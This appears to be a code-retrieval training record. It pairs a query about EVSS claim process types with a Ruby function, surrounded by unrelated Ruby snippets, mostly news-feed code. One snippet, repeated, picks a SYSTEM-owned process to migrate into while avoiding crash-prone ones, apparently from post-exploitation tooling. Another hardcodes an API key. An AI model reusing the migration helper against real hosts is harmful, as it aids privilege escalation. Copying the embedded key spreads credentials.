"def send_news\n feed = RSS::Parser.parse open(KAGDEV_RSS).read\n last_post_title = feed.channel.item.title\n\n # Check, whether the latest title of the post at KAG development\n # blog is still the same, as it was, when the fetcher checked it last\n # time.\n return if unchanged?(last_post_title)\n\n item = feed.channel.item\n\n last_post_date = item.pubDate\n last_post_author = item.dc_creator\n last_post_link = item.link\n\n News.create(\n :title => last_post_title,\n :date => last_post_date,\n :author => last_post_author,\n :link => last_post_link\n )\n\n real_author = reveal_author(last_post_author)\n short_link = open(\"http://clck.ru/--?url=#{last_post_link}\").read\n\n Bot::CHANNELS.each do |chan|\n Channel(chan).send I18n.news_fetcher.news(real_author, last_post_title, short_link)\n end\n rescue SocketError\n nil\n end",
"def fetch(feed_key)\n url = @feeds[feed_key.to_s]['url']\n puts \"Fetching #{url}\"\n begin\n feed = FeedTools::Feed.open(url)\n items = feed.items\n items.each do |item|\n @post = Post.find_or_initialize_by_link(item.link)\n @post.guid = item.id\n @post.title = item.title\n @post.link = item.link\n @post.time = item.time\n @post.feed = feed_key\n @post.tags = item.tags\n @post.content = item.content\n @post.permalink = @post.generated_permalink || item.link\n @post.media_thumbnail_link = item.media_thumbnail_link\n @post.save\n end\n rescue FeedTools::FeedAccessError => errmsg\n puts \"\\tFailed to fetch #{url}\\n\\t#{errmsg}\\n\\tSkipping #{url}\"\n end\n end",
"def index\n @agencyfeeds = AgencyFeed.all\n\n render :index, status: :ok\n end",
"def set_gg_news\n @gg_news = GgNews.find(params[:id])\n end",
"def show\n render json: NewsEntry.find(params[:id]).to_json(include: [:feed])\n end",
"def load_newest\n ids = @api.fetch_new_story_ids\n load_by_ids ids\n end",
"def rss\n render_rss_feed_for Announcement.find(:all, :order => 'created_at DESC',\n :limit => 10), {\n :feed => {\n :title => 'OpenMind New Announcements',\n :link => announcements_url,\n :pub_date => :created_at\n },\n :item => {\n :title => :headline,\n :description => :formatted_description,\n :link => Proc.new{|announcement| \"#{announcements_url}##{announcement.id}\" }\n }\n }\n end",
"def set_news_feed_link\n @news_feed_link = NewsFeedLink.find(params[:id])\n end",
"def index\n news_url = 'https://newsapi.org/v1/articles?source=national-geographic&sortBy=top&apiKey=ba8b42abfab743f3bfe37fe0f9df3557'\n response = HTTParty.get(news_url)\n @news_data = response\n\n @all_posts = current_user.posts\n # @new_post = Post.new #post is not tagged to user\n @new_post = current_user.posts.new\n end",
"def set_import_ma_news\n @import_ma_news = ImportMaNew.find(params[:id])\n end",
"def parse_feed url=rss_url, now = Time.now\n\n options = {\n user_agent: 'Geolinguist Test',\n max_redirects: 2,\n compress: true\n }\n\n\n f = Feedjira::Feed.fetch_and_parse url, options\n if f.url != rss_url.sub(RSS_SUFFIX,'')\n self.base_url = f.url.sub(RSS_SUFFIX,'').sub(SUFFIX,'')\n url = rss_url\n save\n f = Feedjira::Feed.fetch_and_parse url, options\n end\n\n\n if f.last_modified.blank?\n save_and_update_last_fetched now if self.last_fetched.blank?\n return\n end\n if last_fetched.blank? || f.last_modified > last_fetched\n puts f.inspect\n f.entries.each do |entry|\n if last_fetched.blank? || last_fetched < entry.published\n self.total_entries += 1\n body = [entry.title,entry.summary].join(\"\\n\")\n matches = LanguageRecognizer.recognize body\n if matches.blank?\n self.no_matches += 1\n else\n matches.each {|match| self[match] += 1}\n end\n end\n end\n save_and_update_last_fetched now\n end\n end",
"def news\n query = \"SELECT actor_id, post_id, target_id, created_time, updated_time, attribution, message, attachment, likes, comments, permalink, action_links FROM stream WHERE filter_key in (SELECT filter_key FROM stream_filter WHERE uid = '#{@user.id}' AND type = 'newsfeed')\"\n pp @session.fql_query(query)\nend",
"def refresh(force=false)\n # check headers and etag and last modified\n raise \"Missing feed_url\" if feed_url.nil?\n ff = Feedbase::FetchFeed.new(feed_url)\n headers = ff.headers\n if !force \n if last_etag && (headers[:etag] == last_etag)\n puts \"-- #{feed_url} -- ETag cache hit\"\n return\n end\n end\n data = ff.fetch \n params = data[:feed_params].merge(:alpha_title => make_alpha_title(data[:feed_params][:title])) \n if params[:feed_url] != self[:feed_url]\n if x = self.class.filter(:feed_url => params[:feed_url]).first\n raise Redirected.new(\"Redirected to existing feed: #{x.feed_url}\")\n end\n end\n params.delete(:feed_url) \n begin Sequel::DatabaseError\n update params\n rescue StandardError # PGError\n puts \"The offending record is #{self.inspect}\"\n raise\n end\n\n Feedbase::FeedDownload.create({feed_id: feed_id}.merge(data[:download_params])) \n items_created = data[:items].\n select {|item| Feedbase::Item[:guid => item[:guid]].nil?}.\n map { |item|\n params = {\n feed_id: feed_id,\n title: item[:title].encode(\"utf-8\"), \n guid: item[:guid], \n link: item[:link],\n content: item[:content],\n author: item[:author],\n word_count: item[:word_count],\n pub_date: item[:pub_date]\n }\n Feedbase::Item.create params\n }\n # caller can extract an item count from this\n items_created\n end",
"def set_news\n @news = News.friendly.find(params[:id])\n end",
"def insert_news_if_necessary(url)\n latest_date = latest_news_date(Feed.id_from_url(url))\n latest_date = Setting.keep_news_time if latest_date.zero?\n\n channel = Arss::FeedParser.parse_uri(url).feed['channel']\n return unless channel.has_key? 'items'\n\n channel['items'].each do |item|\n if Setting.get_delete_after_days.nonzero?\n next if (item['pubDate'] <= latest_date or item['pubDate'] < Setting.keep_news_time)\n end\n\n create(:user_id => User.current_user_id, :feed_id => Feed.id_from_url(url),\n :title => item['title'], :description => item['description'],\n :url => item['link'], :read => 0, :date => item['pubDate'])\n end\n end",
"def index\n @news_stories = NewsStory.all\n end",
"def latest_news(feed_url, options={})\n div_id = options[:div_id] || \"news_feed\"\n s = <<-EOF\n<div id=\"#{div_id}\"></div>\n\n<script type=\"text/javascript\">\n\n google.load(\"feeds\", \"1\");\n\n function #{div_id}_init() {\n var feed = new google.feeds.Feed(\"#{feed_url}\");\n feed.setNumEntries(3)\n feed.load(function(result) {\n if (!result.error) {\n var container = $(\"##{div_id}\");\n for (var i = 0; i < result.feed.entries.length; i++) {\n var entry = result.feed.entries[i];\n container.append('<div><div class=\"blog_title\"><a href=\"' + entry.link + '\">' + entry.title + '</a></div>'\n + '<div class=\"blog_body\">' + entry.contentSnippet + '</div>'\n + '<div class=\"blog_date\">' + entry.publishedDate + '</div>'\n + '</div>');\n }\n }\n });\n }\n google.setOnLoadCallback(#{div_id}_init);\n</script>\n EOF\n s.html_safe\n end",
"def scrape\n articles = []\n url = 'http://feeds.news.com.au/heraldsun/rss/heraldsun_news_sport_2789.xml'\n\n open(url) do |rss|\n feed = RSS::Parser.parse(rss)\n feed.items.each do |item|\n articles << (interpret item)\n end\n end\n articles\n end",
"def allfeedseen\n\t\tusernews = News.where(:targetuser_id => current_user.id).all\n\t\tusernews.update_all(:seen => 1);\n\t\tusernews.order('created_at DESC').offset(20).destroy_all\n\n\t\trespond_to do |format|\n format.json { render json: {} , status: 200 }\n end\n\tend",
"def set_news\n @news = News.friendly.find(params[:id])\n end",
"def set_newsinfo\n @newsinfo = Newsinfo.find(params[:id])\n end",
"def index\n @api_v1_news_links = Api::V1::NewsLink.all\n end",
"def set_news\n\t\t@news = News.find(params[:id])\n\tend",
"def set_news\n @news = News.unscoped.find(params[:id])\n end",
"def update\n if @news.update_attributes(news_params)\n render json: @news, status: :ok\n else\n render json: {message: \"Not found\"}, status: :not_found\n end\n end",
"def set_news\n @news = News.find(params[:id])\n puts @news\n end",
"def feed\n @posts = Post.feed_of(params[:id])\n end",
"def _state_news(state_id)\n get('state/news', state_id, options: { type: :array })\n end",
"def index\n @feed_infos = FeedInfo.all\n end",
"def feed\n @blog_articles = BlogArticle.all\n respond_to do |format|\n format.rss { render layout: false }\n end\n end",
"def index\n @api_v1_news_link_comments = Api::V1::NewsLinkComment.all\n end",
"def fetch\n options = {:on_success => method(:success), :on_failure => method(:failure), :timeout => 30}\n feed = Feedzirra::Feed.fetch_and_parse(self.feed_url, options)\n rescue Exception => e\n puts \"Failure fetching feed: #{e.message}\" \n end",
"def set_news_source\n @news_source = NewsSource.find(params[:id])\n end",
"def update\n @news_agency = NewsAgency.find(params[:id])\n\n respond_to do |format|\n if @news_agency.update_attributes(params[:news_agency])\n format.html { redirect_to @news_agency, notice: 'News agency was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @news_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @news_hits = NewsHit.all\n end",
"def fetch\n headers = {\n \"User-Agent\" => \"#{HTTP::Request::USER_AGENT} (rubyland aggregator)\"\n }\n\n unless refresh == :hard\n if db_feed.http_etag\n headers[\"If-None-Match\"] = db_feed.http_etag\n end\n if db_feed.http_last_modified\n headers['If-Modified-Since'] = db_feed.http_last_modified\n end\n end\n\n # Loop redirects, marking new permanent url if all 304s\n tries = 0\n fetch_url = feed_url\n new_url = nil\n response = nil\n permanent_new_url = nil\n all_301s = true\n\n while tries < max_redirects\n tries += 1\n response = HTTP.use(:auto_inflate).headers(headers).get(fetch_url)\n\n if HTTP::Redirector::REDIRECT_CODES.include? response.status\n if response.status != 301\n all_301s = false\n end\n fetch_url = response.headers[\"Location\"]\n else\n break\n end\n end\n\n return response, (tries > 1 && all_301s ? fetch_url : nil)\n end"
] | [
"0.7513578",
"0.68720174",
"0.68716896",
"0.6681916",
"0.6586323",
"0.6517632",
"0.6508943",
"0.6480259",
"0.64605004",
"0.6435497",
"0.6354102",
"0.6225285",
"0.62074596",
"0.61961514",
"0.61918014",
"0.61565053",
"0.61554474",
"0.61537933",
"0.6133251",
"0.6123011",
"0.61040646",
"0.60741955",
"0.6051198",
"0.60478795",
"0.60367537",
"0.60222876",
"0.60211647",
"0.59878343",
"0.59760165",
"0.59730506",
"0.596795",
"0.59661406",
"0.5938717",
"0.5918977",
"0.59171444",
"0.5916352",
"0.5903021",
"0.5902748",
"0.5888901",
"0.586886",
"0.5866907",
"0.5866307",
"0.5856966",
"0.5856966",
"0.5856966",
"0.5841115",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834665",
"0.5834031",
"0.58265585",
"0.58170056",
"0.5813806",
"0.5807251",
"0.5807212",
"0.5801951",
"0.57945853",
"0.5793189",
"0.5787303",
"0.5770508",
"0.57486945",
"0.57421833",
"0.5736311",
"0.5735325",
"0.57267725",
"0.57222074",
"0.5717165",
"0.57168895",
"0.5714966",
"0.5712047",
"0.5711885",
"0.5710832",
"0.5701092",
"0.569737",
"0.5678862",
"0.56721663",
"0.5663583",
"0.56611675",
"0.5659657",
"0.565887",
"0.5658662",
"0.56560695",
"0.5627932",
"0.5625654",
"0.56242466",
"0.56230956",
"0.56209266",
"0.5618116",
"0.5617146",
"0.56168556"
] | 0.81743777 | 0 |
returns "STANDARD_CLAIM_PROCESS", "BDD_PROGRAM", or "FDC_PROGRAM" based off of a few attributes in the evss data | def evss_claims_process_type(form526)
if form526['bddQualified']
return 'BDD_PROGRAM'
elsif form526['standardClaim']
return 'STANDARD_CLAIM_PROCESS'
end
'FDC_PROGRAM'
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_system(code)\n return code[2][1][0][1][1][1]\n end",
"def proc_name\n data = read_cpuinfo.match(/model name\\s*:\\s*(.+)/)[1]\n\n return data.strip\n end",
"def getSecurityEvent( event_id )\r\n\r\nputs case event_id\r\nwhen 4608 \r\n return \"Startup\"\r\nwhen 4609 \r\n return \"Shutdown\"\r\n#when 4624 \r\n# return \"Logon\"\r\n#when 4634 \r\n# return \"Logoff\"\r\nwhen 4800 \r\n return \"Lock\"\r\nwhen 4801 \r\n return \"Un-lock\"\r\nwhen 4802 \r\n return \"Screensaver Start\"\r\nwhen 4803\r\n return \"Screensaver End\"\r\nelse\r\n return nil\r\nend\t\r\n\r\nend",
"def pc_system_type_decode(type)\n case type\n when 4 then \"Enterprise Server\" # most likely so first\n when 0 then \"Unspecified\"\n when 1 then \"Desktop\"\n when 2 then \"Mobile\"\n when 3 then \"Workstation\"\n when 5 then \"SOHO Server\"\n when 6 then \"Appliance PC\"\n when 7 then \"Performance Server\"\n when 8 then \"Maximum\"\n end\n end",
"def parse_oleprocinfo(proc_info)\n\t\tcommand = proc_info.Name\n\t\tpid = proc_info.ProcessId\n\t\tuid = 0\n\t\tcmdline = proc_info.CommandLine\n\t\trss = proc_info.MaximumWorkingSetSize\n\t\ttime = proc_info.KernelModeTime.to_i + proc_info.UserModeTime.to_i\n\n\t\t{\n\t\t\t:pid => pid,\n\t\t\t:uid => uid,\n\t\t\t:command => command,\n\t\t\t:cmdline => cmdline,\n\t\t\t:mem => rss,\n\t\t\t:cpu => time,\n\t\t}\n\tend",
"def parse_oleprocinfo(proc_info)\n\t\tcommand = proc_info.Name\n\t\tpid = proc_info.ProcessId\n\t\tuid = 0\n\t\tcmdline = proc_info.CommandLine\n\t\trss = proc_info.MaximumWorkingSetSize\n\t\ttime = proc_info.KernelModeTime.to_i + proc_info.UserModeTime.to_i\n\n\t\t{\n\t\t\t:pid => pid,\n\t\t\t:uid => uid,\n\t\t\t:command => command,\n\t\t\t:cmdline => cmdline,\n\t\t\t:mem => rss,\n\t\t\t:cpu => time,\n\t\t}\n\tend",
"def composite_med_proc_id\n elem = []\n if ((!cpt_code.blank? and !revenue_code.blank?)|| revenue_code.blank?)\n proc_code = \"HC:#{cpt_code}\"\n else\n proc_code = \"NU:#{revenue_code}\"\n end\n\n # proc_code = ((!cpt_code.blank? and !revenue_code.blank?) || revenue_code.blank?) ? \"HC:#{cpt_code}\" : \"NU:#{revenue_code}\"\n elem = [proc_code, service.service_modifier1 , service.service_modifier2 ,\n service.service_modifier3 , service.service_modifier4]\n elem = Output835.trim_segment(elem)\n elem.join(':')\n end",
"def service_prov_identification\n code, qual = nil, nil\n claim = eob.claim_information\n\n if (claim && !claim.provider_npi.blank?)\n code = claim.provider_npi\n qual = 'XX'\n Output835.log.info \"Provider NPI from the 837 is chosen\"\n elsif (claim && !claim.provider_ein.blank?)\n code = claim.provider_ein\n qual = 'FI'\n Output835.log.info \"Provider TIN from 837 is chosen\"\n elsif !facility.facility_npi.blank?\n code = facility.facility_npi\n qual = 'XX'\n Output835.log.info \"facility NPI from FC is chosen\"\n elsif !facility.facility_tin.blank?\n code = facility.facility_tin\n qual = 'FI'\n Output835.log.info \"facility TIN from FC is chosen\"\n end\n\n return code, qual\n end",
"def explain_application_info(org_text)\n retval = {} # Default\n return retval unless org_text\n\n if org_text.match('Application = ')\n appl = SyspApplication.get_cached_instance(org_text.split(' ')[2].to_i)\n if appl\n retval[:short_info] = appl.name\n retval[:long_info] = \"#{appl.description} >> Team: #{appl.developmentteam.name}\"\n else\n retval[:short_info] = \"Application not found for #{org_text}\"\n end\n end\n\n if org_text.match('ID_WSMethod = ')\n ws = Wsmethod.get_cached_instance(org_text.split(' ')[2].to_i)\n if ws\n retval[:short_info] = ws.name\n retval[:long_info] = \"#{ws.name}\"\n else\n retval[:short_info] = \"WSMethod not found for #{org_text}\"\n end\n end\n\n if org_text.match('ID_OFMsgType = ')\n mt = Ofmessagetype.get_cached_instance(org_text.split(' ')[2].to_i, session[:database].hash)\n if mt\n retval[:short_info] = mt.name\n retval[:long_info] = \"#{mt.description} >> Domain: #{mt.domain.name}\"\n else\n retval[:short_info] = \"OFMessagetype not found for #{org_text}\"\n end\n end\n\n\n\n retval\n end",
"def value\n cmd = \"#{resource[:tunable]}\"\n case cmd\n when 'schedo'\n schedo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'vmo'\n vmo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'ioo'\n ioo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'lvmo'\n lvmo('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'no'\n no('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n when 'nfso'\n nfso('-x', \"#{resource[:attribute]}\").split(',')[1].chomp\n end\n end",
"def auditString\n\t\tif(!self.blob.nil?)\n\t\t\tblobData = JSON.parse(self.blob, {:symbolize_names => true})\n\t\tend\n\n\t\treturn case self.event_type\n\t\twhen EVENT_TYPE::PROV_PASS_REQUEST then \"Provisional Pass requested\"\n\t\twhen EVENT_TYPE::PROV_PASS_APPROVE then \"Provisional Pass approved\"\n\t\twhen EVENT_TYPE::PROV_PASS_DENY then \"Provisional Pass denied\"\n\t\twhen EVENT_TYPE::PROV_PASS_REQCANCEL then \"Provisional Pass request cancelled\"\n\t\twhen EVENT_TYPE::ADMIN_OVERRIDE_PRIVATE_APP then \"Private app view restrictions overridden\"\n\t\twhen EVENT_TYPE::ADMIN_OVERRIDE_PRIVATE_TEST then \"Private test view restrictions overridden\"\n\t\twhen EVENT_TYPE::APP_CREATE then \"App created\"\n\t\twhen EVENT_TYPE::APP_RENAME then \"App renamed <b>#{Rack::Utils::escape_html(blobData[:fromName])}</b> to <b>#{Rack::Utils::escape_html(blobData[:toName])}</b>\"\n\t\twhen EVENT_TYPE::APP_LINK then \"App linked to EID #{Rack::Utils::escape_html(self.target_b)} (#{Rack::Utils::escape_html(self.details_txt)})\"\n\t\twhen EVENT_TYPE::APP_UNLINK then \"App unlinked from EID #{Rack::Utils::escape_html(self.target_b)}\"\n\t\twhen EVENT_TYPE::APP_MADE_GLOBAL then \"App marked <b>global</b>\"\n\t\twhen EVENT_TYPE::APP_MADE_NOTGLOBAL then \"App marked <b>not global</b>\"\n\t\twhen EVENT_TYPE::APP_MADE_PRIVATE then \"App marked <b>private</b>\"\n\t\twhen EVENT_TYPE::APP_MADE_NOTPRIVATE then \"App marked <b>not private</b>\"\n\t\twhen EVENT_TYPE::APP_RTCHANGE then \"Changed app RecordType <b>#{Rack::Utils::escape_html(blobData[:fromName])}</b> to <b>#{Rack::Utils::escape_html(blobData[:toName])}</b>\"\n\t\twhen EVENT_TYPE::APP_GEO_SET then \"Set app geo to <b>#{geoToString(blobData[:geoId])}</b>\"\n\t\twhen EVENT_TYPE::APP_DELETE then \"App deleted\"\n\t\twhen EVENT_TYPE::APP_FLAG_ADD then \"App flagged with <b>#{Rack::Utils::escape_html(blobData[:flagName])}</b>\"\n\t\twhen EVENT_TYPE::APP_FLAG_REM then \"App flag <b>#{Rack::Utils::escape_html(blobData[:flagName])}</b> removed\"\n\t\twhen EVENT_TYPE::APP_OWNER_ASSIGN then \"App owner set to <b>#{Rack::Utils::escape_html(blobData[:userName])}</b>\"\n\t\twhen EVENT_TYPE::TEST_CREATE then \"Test created\"\n\t\twhen EVENT_TYPE::TEST_RENAME then \"Test renamed <b>#{Rack::Utils::escape_html(blobData[:fromName])}</b> to <b>#{Rack::Utils::escape_html(blobData[:toName])}</b>\"\n\t\twhen EVENT_TYPE::TEST_REVIEWER_UNASSIGNED then \"Reviewer (<b>#{Rack::Utils::escape_html(blobData[:userName])}</b>) unassigned\"\n\t\twhen EVENT_TYPE::TEST_REVIEWER_ASSIGNED then \"Reviewer (<b>#{Rack::Utils::escape_html(blobData[:userName])}</b>) assigned\"\n\t\twhen EVENT_TYPE::TEST_INPROG then \"Test in progress\"\n\t\twhen EVENT_TYPE::TEST_PASS_REQ_APPROVAL then \"Test passed pending approval\"\n\t\twhen EVENT_TYPE::TEST_PASS then \"<b>Test passed</b> and closed\"\n\t\twhen EVENT_TYPE::TEST_FAIL_REQ_APPROVAL then \"Test failed pending approval\"\n\t\twhen EVENT_TYPE::TEST_FAIL then \"<b>Test failed</b> and closed\"\n\t\twhen EVENT_TYPE::TEST_DELETE then \"Test deleted\"\n\t\twhen EVENT_TYPE::USER_LOGIN then \"User successfully logged in via #{blobData[:type]}\"\n\t\twhen EVENT_TYPE::USER_LOGIN_FAILURE then \"User login failed via #{blobData[:type]}\"\n\t\telse \"UNK\"\n\t\tend\n\tend",
"def get_event_type(code, params)\n type = EVENT_COMMAND_CODES[code]\n\n # Control variables can be assigned scripts:\n if code == 122 and params[3] == 4 then\n type[1] = true\n end\n\n type.nil? ? [code, false] : type\nend",
"def get_system_proc\r\n\t\t# Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n\t\tlocal_sys = resolve_sid(\"S-1-5-18\")\r\n\t\tsystem_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n\t\t# Processes that can Blue Screen a host if migrated in to\r\n\t\tdangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n\t\tsession.sys.process.processes.each do |p|\r\n\t\t\t# Check we are not migrating to a process that can BSOD the host\r\n\t\t\tnext if dangerous_processes.include?(p[\"name\"])\r\n\t\t\tnext if p[\"pid\"] == session.sys.process.getpid\r\n\t\t\tnext if p[\"pid\"] == 4\r\n\t\t\tnext if p[\"user\"] != system_account_name\r\n\t\t\treturn p\r\n\t\tend\r\n\tend",
"def parse_program(prog)\n prog_bytes = to_bytes(prog)\n data = {}\n raise \"Invalid program\" unless prog[0, 4] == 'PROG'\n name = prog[4...16]\n data[:name] = program_name(prog)\n\n HR_PARAMS.each do |(key, ms_offset, ls_offset, ls_pos, units)|\n # single byte value\n value = prog_bytes[ms_offset]\n data[key] = value\n # high resolution value\n value_hr = (value << 2) | ((prog_bytes[ls_offset] >> ls_pos) & 0x03)\n data[:\"#{key}_hr\"] = value_hr\n if units\n # converted value:\n data[:\"#{key}_#{units}\"] = CONVERTERS[units][value_hr]\n end\n end\n\n CONV_PARAMS.each do |(key, offset, bit_pos, bit_len, units)|\n value = bits(prog_bytes[offset], bit_pos, bit_len)\n data[key] = CONVERTERS[units][value]\n if value != data[key]\n data[:\"#{key}_value\"] = value\n end\n end\n\n data[:seq_notes] = (96..426).step(22).map{|offset| note_name prog_bytes[offset]}\n (data[:step_length]...data[:seq_notes].size).each do |i|\n data[:seq_notes][i] = ''\n end\n # puts data[:seq_notes].join(' ')\n\n data[:lfo_rate_vis] = data[:lfo_bpm_sync] == 'ON' ? data[:lfo_rate_bpm] : data[:lfo_rate_hr]\n data[:eg_int_abs] = data[:eg_int_signed].abs\n data[:lfo_int_abs] = data[:lfo_int_signed].abs\n data\nend",
"def program_name(qc_inspection_type_code)\n ProgramFunction.generic_program_name( 'QC', qc_inspection_type_code )\n end",
"def get_system_proc\r\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n local_sys = resolve_sid(\"S-1-5-18\")\r\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n this_pid = session.sys.process.getpid\r\n # Processes that can Blue Screen a host if migrated in to\r\n dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n session.sys.process.processes.each do |p|\r\n # Check we are not migrating to a process that can BSOD the host\r\n next if dangerous_processes.include?(p[\"name\"])\r\n next if p[\"pid\"] == this_pid\r\n next if p[\"pid\"] == 4\r\n next if p[\"user\"] != system_account_name\r\n return p\r\n end\r\n end",
"def attribute_string\n s = []\n s << \"PROGRAM-ID=#{ (program_id || 1).to_i }\"\n s << \"BANDWIDTH=#{ bandwidth.to_i }\"\n s << \"CODECS=\\\"#{ codecs }\\\"\" if codecs\n s << \"RESOLUTION=#{ resolution }\" if resolution\n s.join(',')\n end",
"def get_pt_type(device)\n fs_check = Mixlib::ShellOut.new(\"blkid -c /dev/null #{device}\")\n fs_check.run_command\n match = fs_check.stdout.match(/\\sPTTYPE=\\\"(.*?)\\\"/)\n match = '' if match.nil?\n\n Chef::Log.info(\"Partition type for device #{device}: #{match[1]}\")\n match[1]\nend",
"def service_payee_identification\n code, qual = nil, nil\n claim = eob.claim_information\n fac = facility\n\n if (claim && !claim.payee_npi.blank?)\n code = claim.payee_npi\n qual = 'XX'\n Output835.log.info \"Payee NPI from the 837 is chosen\"\n elsif (claim && !claim.payee_tin.blank?)\n code = claim.payee_tin\n qual = 'FI'\n Output835.log.info \"Payee TIN from 837 is chosen\"\n elsif !fac.facility_npi.blank?\n code = fac.facility_npi\n qual = 'XX'\n Output835.log.info \"facility NPI from FC is chosen\"\n elsif !fac.facility_tin.blank?\n code = fac.facility_tin\n qual = 'FI'\n Output835.log.info \"facility TIN from FC is chosen\"\n end\n\n return code, qual\n end",
"def get_event_type_for_csi_entry\n event_type ? get_event_type_separated.gsub('MI', 'MX') : '?'\n end",
"def compare_sdc\n @attribute_all.each{|attribute_name,attribute_data|\n case attribute_name\n when \"define_clock\"\n attribute_data[0].each_value{|each|\n sdc_signal = \"chiptop.chip.\" + each.Signal_mod.gsub(\"/\",\".\")\n @RPT_ERR.each{|key,err|\n if err.AttributeName == attribute_name && err.SignalName == sdc_signal\n each.ConstCheckFlag = 0\n each.SynthesisReport = err.Message\n end\n }\n }\n when \"xc_pulldown\", \"xc_pullup\"\n attribute_data[0].each_value{|each|\n sdc_signal = \"chiptop.chip.\" + each.Pin_mod.gsub(\"/\",\".\")\n @RPT_ERR.each{|key,err|\n if err.AttributeName == \"define_attribute\" && err.SignalName == sdc_signal\n each.ConstCheckFlag = 0\n each.SynthesisReport = err.Message\n end\n }\n }\n when \"syn_keep\"\n attribute_data[0].each_value{|each|\n sdc_signal = \"chiptop.chip.\" + each.Pin_mod.gsub(\"/\",\".\")\n @RPT_ERR.each{|key,err|\n if err.AttributeName == \"define_attribute\" && err.SignalName == sdc_signal\n each.ConstCheckFlag = 0\n each.SynthesisReport = err.Message\n end\n }\n }\n end\n }\n end",
"def schema\n {\n 'AM'\t=> 'Segment Identification',\n 'EY'\t=> 'Provider ID Qualifier',\n 'E9'\t=> 'Provider ID' }\n end",
"def types\n\t\t\t\tlist.reduce({}) { |h, x|\n\t\t\t\t\tbegin\n\t\t\t\t\t\th.merge!(x =>\n\t\t\t\t\t\t\tcase IO.read(File.join('/proc', x.to_s, 'stat')).split[2]\n\t\t\t\t\t\t\t\twhen ?S.freeze then :sleeping\n\t\t\t\t\t\t\t\twhen ?I.freeze then :idle\n\t\t\t\t\t\t\t\twhen ?Z.freeze then :zombie\n\t\t\t\t\t\t\t\twhen ?R.freeze then :running\n\t\t\t\t\t\t\t\telse :unknown\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\t)\n\t\t\t\t\trescue Exception\n\t\t\t\t\t\th\n\t\t\t\t\tend\n\t\t\t\t}\n\t\t\tend",
"def program_name?\n\t\"diagnostics\"\n end",
"def get_tenant_and_evs_name()\n usrstr = @resource[:name].split(\"/\")\n if usrstr.length == 2\n return usrstr[0], usrstr[1]\n else\n fail \"Invalid EVS name #{@resource[:name]} \\n\" \\\n \"Name convention must be <tenant>/<evs>\"\n end\n end",
"def get_os\n system=`/usr/bin/sw_vers -productVersion`.chomp.split(\".\").slice(1).to_i\n if system==4 then\n return \"tiger\"\n else\n return \"leo\"\n end\nend",
"def service_prov_name\n Output835.log.info \"Printing NM1*82 for Patient Acc Num : #{eob.patient_account_number}\"\n prov_id, qualifier = service_prov_identification\n service_prov_name_elements = []\n service_prov_name_elements << 'NM1'\n service_prov_name_elements << '82'\n service_prov_name_elements << (eob.rendering_provider_last_name.to_s.strip.blank? ? '2': '1')\n service_prov_name_elements << prov_last_name_or_org\n service_prov_name_elements << eob.rendering_provider_first_name\n service_prov_name_elements << eob.rendering_provider_middle_initial\n service_prov_name_elements << ''\n service_prov_name_elements << eob.rendering_provider_suffix\n service_prov_name_elements << qualifier\n service_prov_name_elements << prov_id\n service_prov_name_elements = Output835.trim_segment(service_prov_name_elements)\n service_prov_name_elements.join(@element_seperator)\n end",
"def ace_type_string\n case @ace_type\n when 0x0\n 'ACCESS_ALLOWED_ACE_TYPE'\n when 0x1\n 'ACCESS_DENIED_ACE_TYPE'\n when 0x2\n 'SYSTEM_AUDIT_ACE_TYPE'\n when 0x3\n 'SYSTEM_ALARM_ACE_TYPE'\n when 0x4\n 'ACCESS_ALLOWED_COMPOUND_ACE_TYPE'\n when 0x5\n 'ACCESS_ALLOWED_OBJECT_ACE_TYPE'\n when 0x6\n 'ACCESS_DENIED_OBJECT_ACE_TYPE'\n when 0x7\n 'SYSTEM_AUDIT_OBJECT_ACE_TYPE'\n when 0x8\n 'SYSTEM_ALARM_OBJECT_ACE_TYPE'\n when 0x9\n 'ACCESS_ALLOWED_CALLBACK_ACE_TYPE'\n when 0xA\n 'ACCESS_DENIED_CALLBACK_ACE_TYPE'\n when 0xB\n 'ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE'\n when 0xC\n 'ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE'\n when 0xD\n 'SYSTEM_AUDIT_CALLBACK_ACE_TYPE'\n when 0xE\n 'SYSTEM_ALARM_CALLBACK_ACE_TYPE'\n when 0xF\n 'SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE'\n when 0x10\n 'SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE'\n end\n end",
